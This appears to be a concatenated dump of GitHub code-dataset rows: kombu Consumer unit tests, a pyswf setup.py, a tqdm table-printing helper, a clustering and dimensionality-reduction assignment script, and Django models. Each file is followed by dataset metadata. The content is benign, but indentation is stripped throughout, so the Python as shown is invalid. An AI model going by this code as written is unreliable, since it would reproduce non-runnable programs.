def test_consume_without_queues_returns(self):
consumer = self.connection.Consumer()
consumer.queues[:] = []
assert consumer.consume() is None
def test_consuming_from(self):
consumer = self.connection.Consumer()
consumer.queues[:] = [Queue('a'), Queue('b'), Queue('d')]
consumer._active_tags = {'a': 1, 'b': 2}
assert not consumer.consuming_from(Queue('c'))
assert not consumer.consuming_from('c')
assert not consumer.consuming_from(Queue('d'))
assert not consumer.consuming_from('d')
assert consumer.consuming_from(Queue('a'))
assert consumer.consuming_from(Queue('b'))
assert consumer.consuming_from('b')
def test_receive_callback_without_m2p(self):
channel = self.connection.channel()
c = channel.Consumer()
m2p = getattr(channel, 'message_to_python')
channel.message_to_python = None
try:
message = Mock()
message.errors = []
message.decode.return_value = 'Hello'
recv = c.receive = Mock()
c._receive_callback(message)
recv.assert_called_with('Hello', message)
finally:
channel.message_to_python = m2p
def test_receive_callback__message_errors(self):
channel = self.connection.channel()
channel.message_to_python = None
c = channel.Consumer()
message = Mock()
try:
raise KeyError('foo')
except KeyError:
message.errors = [sys.exc_info()]
message._reraise_error.side_effect = KeyError()
with pytest.raises(KeyError):
c._receive_callback(message)
def test_set_callbacks(self):
channel = self.connection.channel()
queue = Queue('qname', self.exchange, 'rkey')
callbacks = [lambda x, y: x,
lambda x, y: x]
consumer = Consumer(channel, queue, auto_declare=True,
callbacks=callbacks)
assert consumer.callbacks == callbacks
def test_auto_declare(self):
channel = self.connection.channel()
queue = Queue('qname', self.exchange, 'rkey')
consumer = Consumer(channel, queue, auto_declare=True)
consumer.consume()
consumer.consume() # twice is a noop
assert consumer.queues[0] is not queue
assert consumer.queues[0].is_bound
assert consumer.queues[0].exchange.is_bound
assert consumer.queues[0].exchange is not self.exchange
for meth in ('exchange_declare',
'queue_declare',
'queue_bind',
'basic_consume'):
assert meth in channel
assert channel.called.count('basic_consume') == 1
assert consumer._active_tags
consumer.cancel_by_queue(queue.name)
consumer.cancel_by_queue(queue.name)
assert not consumer._active_tags
def test_consumer_tag_prefix(self):
channel = self.connection.channel()
queue = Queue('qname', self.exchange, 'rkey')
consumer = Consumer(channel, queue, tag_prefix='consumer_')
consumer.consume()
assert consumer._active_tags[queue.name].startswith('consumer_')
def test_manual_declare(self):
channel = self.connection.channel()
queue = Queue('qname', self.exchange, 'rkey')
consumer = Consumer(channel, queue, auto_declare=False)
assert consumer.queues[0] is not queue
assert consumer.queues[0].is_bound
assert consumer.queues[0].exchange.is_bound
assert consumer.queues[0].exchange is not self.exchange
for meth in ('exchange_declare',
'queue_declare',
'basic_consume'):
assert meth not in channel
consumer.declare()
for meth in ('exchange_declare',
'queue_declare',
'queue_bind'):
assert meth in channel
assert 'basic_consume' not in channel
consumer.consume()
assert 'basic_consume' in channel
def test_consume__cancel(self):
channel = self.connection.channel()
queue = Queue('qname', self.exchange, 'rkey')
consumer = Consumer(channel, queue, auto_declare=True)
consumer.consume()
consumer.cancel()
assert 'basic_cancel' in channel
assert not consumer._active_tags
def test___enter____exit__(self):
channel = self.connection.channel()
queue = Queue('qname', self.exchange, 'rkey')
consumer = Consumer(channel, queue, auto_declare=True)
context = consumer.__enter__()
assert context is consumer
assert consumer._active_tags
res = consumer.__exit__(None, None, None)
assert not res
assert 'basic_cancel' in channel
assert not consumer._active_tags
def test_flow(self):
channel = self.connection.channel()
queue = Queue('qname', self.exchange, 'rkey')
consumer = Consumer(channel, queue, auto_declare=True)
consumer.flow(False)
assert 'flow' in channel
def test_qos(self):
channel = self.connection.channel()
queue = Queue('qname', self.exchange, 'rkey')
consumer = Consumer(channel, queue, auto_declare=True)
consumer.qos(30, 10, False)
assert 'basic_qos' in channel
def test_purge(self):
channel = self.connection.channel()
b1 = Queue('qname1', self.exchange, 'rkey')
b2 = Queue('qname2', self.exchange, 'rkey')
b3 = Queue('qname3', self.exchange, 'rkey')
b4 = Queue('qname4', self.exchange, 'rkey')
consumer = Consumer(channel, [b1, b2, b3, b4], auto_declare=True)
consumer.purge()
assert channel.called.count('queue_purge') == 4
def test_multiple_queues(self):
channel = self.connection.channel()
b1 = Queue('qname1', self.exchange, 'rkey')
b2 = Queue('qname2', self.exchange, 'rkey')
b3 = Queue('qname3', self.exchange, 'rkey')
b4 = Queue('qname4', self.exchange, 'rkey')
consumer = Consumer(channel, [b1, b2, b3, b4])
consumer.consume()
assert channel.called.count('exchange_declare') == 4
assert channel.called.count('queue_declare') == 4
assert channel.called.count('queue_bind') == 4
assert channel.called.count('basic_consume') == 4
assert len(consumer._active_tags) == 4
consumer.cancel()
assert channel.called.count('basic_cancel') == 4
assert not len(consumer._active_tags)
def test_receive_callback(self):
channel = self.connection.channel()
b1 = Queue('qname1', self.exchange, 'rkey')
consumer = Consumer(channel, [b1])
received = []
def callback(message_data, message):
received.append(message_data)
message.ack()
message.payload # trigger cache
consumer.register_callback(callback)
consumer._receive_callback({'foo': 'bar'})
assert 'basic_ack' in channel
assert 'message_to_python' in channel
assert received[0] == {'foo': 'bar'}
def test_basic_ack_twice(self):
channel = self.connection.channel()
b1 = Queue('qname1', self.exchange, 'rkey')
consumer = Consumer(channel, [b1])
def callback(message_data, message):
message.ack()
message.ack()
consumer.register_callback(callback)
with pytest.raises(MessageStateError):
consumer._receive_callback({'foo': 'bar'})
def test_basic_reject(self):
channel = self.connection.channel()
b1 = Queue('qname1', self.exchange, 'rkey')
consumer = Consumer(channel, [b1])
def callback(message_data, message):
message.reject()
consumer.register_callback(callback)
consumer._receive_callback({'foo': 'bar'})
assert 'basic_reject' in channel
def test_basic_reject_twice(self):
channel = self.connection.channel()
b1 = Queue('qname1', self.exchange, 'rkey')
consumer = Consumer(channel, [b1])
def callback(message_data, message):
message.reject()
message.reject()
consumer.register_callback(callback)
with pytest.raises(MessageStateError):
consumer._receive_callback({'foo': 'bar'})
assert 'basic_reject' in channel
def test_basic_reject__requeue(self):
channel = self.connection.channel()
b1 = Queue('qname1', self.exchange, 'rkey')
consumer = Consumer(channel, [b1])
def callback(message_data, message):
message.requeue()
consumer.register_callback(callback)
consumer._receive_callback({'foo': 'bar'})
assert 'basic_reject:requeue' in channel
def test_basic_reject__requeue_twice(self):
channel = self.connection.channel()
b1 = Queue('qname1', self.exchange, 'rkey')
consumer = Consumer(channel, [b1])
def callback(message_data, message):
message.requeue()
message.requeue()
consumer.register_callback(callback)
with pytest.raises(MessageStateError):
consumer._receive_callback({'foo': 'bar'})
assert 'basic_reject:requeue' in channel
def test_receive_without_callbacks_raises(self):
channel = self.connection.channel()
b1 = Queue('qname1', self.exchange, 'rkey')
consumer = Consumer(channel, [b1])
with pytest.raises(NotImplementedError):
consumer.receive(1, 2)
def test_decode_error(self):
channel = self.connection.channel()
b1 = Queue('qname1', self.exchange, 'rkey')
consumer = Consumer(channel, [b1])
consumer.channel.throw_decode_error = True
with pytest.raises(ValueError):
consumer._receive_callback({'foo': 'bar'})
def test_on_decode_error_callback(self):
channel = self.connection.channel()
b1 = Queue('qname1', self.exchange, 'rkey')
thrown = []
def on_decode_error(msg, exc):
thrown.append((msg.body, exc))
consumer = Consumer(channel, [b1], on_decode_error=on_decode_error)
consumer.channel.throw_decode_error = True
consumer._receive_callback({'foo': 'bar'})
assert thrown
m, exc = thrown[0]
assert json.loads(m) == {'foo': 'bar'}
assert isinstance(exc, ValueError)
def test_recover(self):
channel = self.connection.channel()
b1 = Queue('qname1', self.exchange, 'rkey')
consumer = Consumer(channel, [b1])
consumer.recover()
assert 'basic_recover' in channel
def test_revive(self):
channel = self.connection.channel()
b1 = Queue('qname1', self.exchange, 'rkey')
consumer = Consumer(channel, [b1])
channel2 = self.connection.channel()
consumer.revive(channel2)
assert consumer.channel is channel2
assert consumer.queues[0].channel is channel2
assert consumer.queues[0].exchange.channel is channel2
def test_revive__with_prefetch_count(self):
channel = Mock(name='channel')
b1 = Queue('qname1', self.exchange, 'rkey')
Consumer(channel, [b1], prefetch_count=14)
channel.basic_qos.assert_called_with(0, 14, False)
def test__repr__(self):
channel = self.connection.channel()
b1 = Queue('qname1', self.exchange, 'rkey')
assert repr(Consumer(channel, [b1]))
def test_connection_property_handles_AttributeError(self):
p = self.connection.Consumer()
p.channel = object()
assert p.connection is None
| celery/kombu | t/unit/test_messaging.py | test_messaging.py | py | 24,481 | python | en | code | 2,643 | github-code | 6 | [
{
"api_name": "kombu.Exchange",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "kombu.Connection",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "t.mocks.Transport",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "kombu.Producer",
... |
70285709629 | from __future__ import absolute_import
import os
from setuptools import setup, find_packages
# Utility function to read the README file.
# Used for the long_description. It's nice, because now 1) we have a top level
# README file and 2) it's easier to type in the README file than to put a raw
# string in below ...
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
setup(
name='pyswf',
version='1.5.4',
description='SWF Parsing Utilities',
long_description=read('README.md'),
keywords = "swf parser parsing decompile utilities",
author='Tim Knip',
author_email='tim@floorplanner.com',
url='https://github.com/timknip/pyswf',
install_requires = ["lxml>=3.3.0", "Pillow>=2.3.0", "pylzma>=0.4.6", "six"],
packages=find_packages(),
license = "MIT",
classifiers=[
"Development Status :: 4 - Beta",
"Topic :: Utilities",
"License :: OSI Approved :: MIT License",
],
)
| timknip/pyswf | setup.py | setup.py | py | 982 | python | en | code | 154 | github-code | 6 | [
{
"api_name": "os.path.join",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "os.path.dirname",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "setuptools.setup",
"lin... |
33222746920 | from tqdm import tqdm
# Define constant
SHORT = 15
MIDDLE = 30
LARGE = 50
def __clear__(times: int = 11, length: int = 123):
"""
Clear the previous table toward the terminal
"""
print()
for i in range(times + 1):
if i != times:
print("\033[F" + ' ' * length, end='')
else:
print("\033[F", end = '')
print("\r")
def __getCutLine__(length: int = 50, width_cell: int = 10, equal_symbol: bool = True) -> str:
"""
Obtain the cut line
Arg: length - The maximun length of the terminal
width_cell - The width of the table cell
equal_symbol - If use '=' as the symbol or not
Ret: The custom cut line string
"""
cut_string = "+"
acc_length = 0
while True:
if acc_length == 0:
if equal_symbol:
cut_string = cut_string + '=' * (width_cell) + '+'
else:
cut_string = cut_string + '-' * (width_cell) + '+'
acc_length += width_cell
else:
if equal_symbol:
cut_string = cut_string + '=' * (width_cell + 2) + '+'
else:
cut_string = cut_string + '-' * (width_cell + 2) + '+'
acc_length += (width_cell + 2)
if acc_length >= length - width_cell:
break
return cut_string
class tqdm_table(tqdm):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.max_length = 100
self.prev_lines = -1
def set_table_setting(self, max_length: int = 100):
"""
Assign the setting of this object
Arg: max_length - The maximun length of the terminal
"""
self.max_length = max_length
def set_table_info(self, mapping: dict):
"""
Set the table information
Arg: mapping - The key-value pair you want to form the table
"""
key_string = ""
val_string = ""
table_string = []
key_list = sorted(mapping.keys())
# Clear the previous table information toward stdout
if self.prev_lines > 0:
__clear__(self.prev_lines, self.max_length)
# Determine the width of cell
if max([max(len(str(val)), len(key)) for key, val in mapping.items()]) <= 15:
width_length = SHORT
elif max([max(len(str(val)), len(key)) for key, val in mapping.items()]) <= 30:
width_length = MIDDLE
else:
width_length = LARGE
# Collect the lines of keys and values
for key in key_list:
val = mapping[key]
single_max_length = max(len(key), len(str(val)))
if len(key_string) + single_max_length + 2 < self.max_length:
if width_length == SHORT:
key_string += '{:>15} | '.format(key)
val_string += '{:>15} | '.format(val)
elif width_length == MIDDLE:
key_string += '{:>30} | '.format(key)
val_string += '{:>30} | '.format(val)
else:
key_string += '{:>50} | '.format(key)
val_string += '{:>50} | '.format(val)
else:
table_string.append(key_string)
table_string.append(val_string)
if width_length == SHORT:
key_string = '{:>15} | '.format(key)
val_string = '{:>15} | '.format(val)
elif width_length == MIDDLE:
key_string = '{:>30} | '.format(key)
val_string = '{:>30} | '.format(val)
else:
key_string = '{:>50} | '.format(key)
val_string = '{:>50} | '.format(val)
# Accumulate the rest information if there are some information rest
if len(key_string) > 0 or len(val_string) > 0:
table_string.append(key_string)
table_string.append(val_string)
# Transfer the containing of queue into string
cut_string_small = __getCutLine__(length=max([len(_) for _ in table_string]), width_cell=width_length, equal_symbol=False)
cut_string_large = __getCutLine__(length=max([len(_) for _ in table_string]), width_cell=width_length, equal_symbol=True)
print_string = cut_string_large
for i in range(len(table_string) // 2):
print_string = print_string + '\n' + table_string[2*i] + '\n' + cut_string_small + '\n' + table_string[2*i+1] + '\n' + cut_string_large
self.prev_lines = 2 * (len(table_string) + 1)
# Write into tqdm
self.write(print_string) | SunnerLi/tqdm_table | tqdm_table/__init__.py | __init__.py | py | 4,733 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "tqdm.tqdm",
"line_number": 48,
"usage_type": "name"
}
] |
32100438574 | from sklearn.datasets import load_breast_cancer
from sklearn.datasets import load_wine
from E2 import sammon
from E1 import bkmeans
from sklearn.decomposition import PCA
from sklearn.manifold import TSNE
import matplotlib.pyplot as plt
import numpy as np
from sklearn.cluster import KMeans
from scipy.cluster.hierarchy import linkage
from scipy.cluster.hierarchy import dendrogram
sammons_maxiter = 100
e = 0.001
A = 0.3
# Figure 1
fig1, axs1 = plt.subplots(3, 3, figsize=(10, 10))
print(f"Max iter set to {sammons_maxiter}. It might take a total of {sammons_maxiter*3} to run the code. Each iteration takes approx 0.5-2 seconds.")
for i in range(3):
if i == 0:
datasetX, datasetLabels = load_breast_cancer().data, load_breast_cancer().target
dataset_name = 'Breast Cancer Dataset'
elif i == 1:
datasetX, datasetLabels = load_wine().data, load_wine().target
dataset_name = 'Wine Dataset'
elif i == 2:
diabetesData = np.genfromtxt('csv_result-diabetes.csv', delimiter=',', skip_header=1)
datasetX, datasetLabels = diabetesData[:, :-1], diabetesData[:, -1]
dataset_name = 'Diabetes Dataset'
for j in range(3):
if j == 0:
print(f"Computing sammon mapping for {dataset_name} ({i+1}/3)")
result = sammon(datasetX, sammons_maxiter, e, A)
plot_title = 'Sammon Mapping'
elif j == 1:
pca = PCA(n_components=2)
result = pca.fit_transform(datasetX)
plot_title = 'PCA'
elif j == 2:
tsne = TSNE(n_components=2)
result = tsne.fit_transform(datasetX)
plot_title = 't-SNE'
axs1[i, j].scatter(result[:, 0], result[:, 1], c=datasetLabels, s=5)
axs1[i, j].set_title(f'{dataset_name} - {plot_title}')
plt.tight_layout()
fig, axes = plt.subplots(3, 3, figsize=(10, 10))
for i in range(3):
if i == 0:
datasetX, datasetLabels = load_breast_cancer().data, load_breast_cancer().target
dataset_name = 'Breast Cancer Dataset'
elif i == 1:
datasetX, datasetLabels = load_wine().data, load_wine().target
dataset_name = 'Wine Dataset'
elif i == 2:
diabetesData = np.genfromtxt('csv_result-diabetes.csv', delimiter=',', skip_header=1)
datasetX, datasetLabels = diabetesData[:, :-1], diabetesData[:, -1]
dataset_name = 'Diabetes Dataset'
pca = PCA(n_components=2)
X_pca = pca.fit_transform(datasetX)
for j in range(3):
ax = axes[i, j]
if j == 0:
bkmeans_result = bkmeans(X_pca, 2, 30)
c = bkmeans_result
algorithm_name = 'bk means'
elif j == 1:
kmeans_result = KMeans(n_init = 10, n_clusters=2, random_state=0).fit_predict(X_pca)
c = kmeans_result
algorithm_name = 'classic k means'
elif j == 2:
hierarchical_result = linkage(X_pca, method='ward')
dendro = dendrogram(hierarchical_result, ax=ax)
c = datasetLabels
algorithm_name = 'hierarchical'
ax.scatter(X_pca[:, 0], X_pca[:, 1], c=c)
ax.set_title(f'{dataset_name} - {algorithm_name}')
plt.tight_layout()
plt.show()
| Knoz9/ML-A3-A4 | km222ug_A4/E3.py | E3.py | py | 3,231 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "matplotlib.pyplot.subplots",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 18,
"usage_type": "name"
},
{
"api_name": "sklearn.datasets.load_breast_cancer",
"line_number": 22,
"usage_type": "call"
},
{
"... |
40851164655 | from django.db import models
from django.contrib.auth.models import AbstractUser
# Create your models here.
from django.dispatch import receiver
from rest_framework.authtoken.models import Token
from django.db.models.signals import post_save
from django.conf import settings
class User(AbstractUser):
is_teacher = models.BooleanField(default = False)
is_student = models.BooleanField(default = False)
def __Str__(self):
return self.username
#class Teacher(models.Model):
# user = models.OneToOneField(User, on_delete = models.CASCADE, primary_key = True)
#
#class Student(modesl.Model):
# user = models.OneToOneField(User, on_delete = models.CASCADE, primary_key = True)
class Doubt(models.Model):
questions = models.TextField(max_length = 200)
picture = models.ImageField(blank = True, null = True, upload_to='images')
student = models.ForeignKey(User, related_name = 'student', on_delete = models.CASCADE)
teacher = models.ForeignKey(User, related_name = 'teacher', on_delete = models.CASCADE)
@receiver(post_save, sender=settings.AUTH_USER_MODEL)
def create_auth_token(sender, instance=None, created=False, **kwargs):
if created:
Token.objects.create(user=instance) | ali7070droid/doubts-app | myapp/models.py | models.py | py | 1,197 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "django.contrib.auth.models.AbstractUser",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "django.db.models.BooleanField",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "django.db.models",
"line_number": 11,
"usage_type": "name"
},
{... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.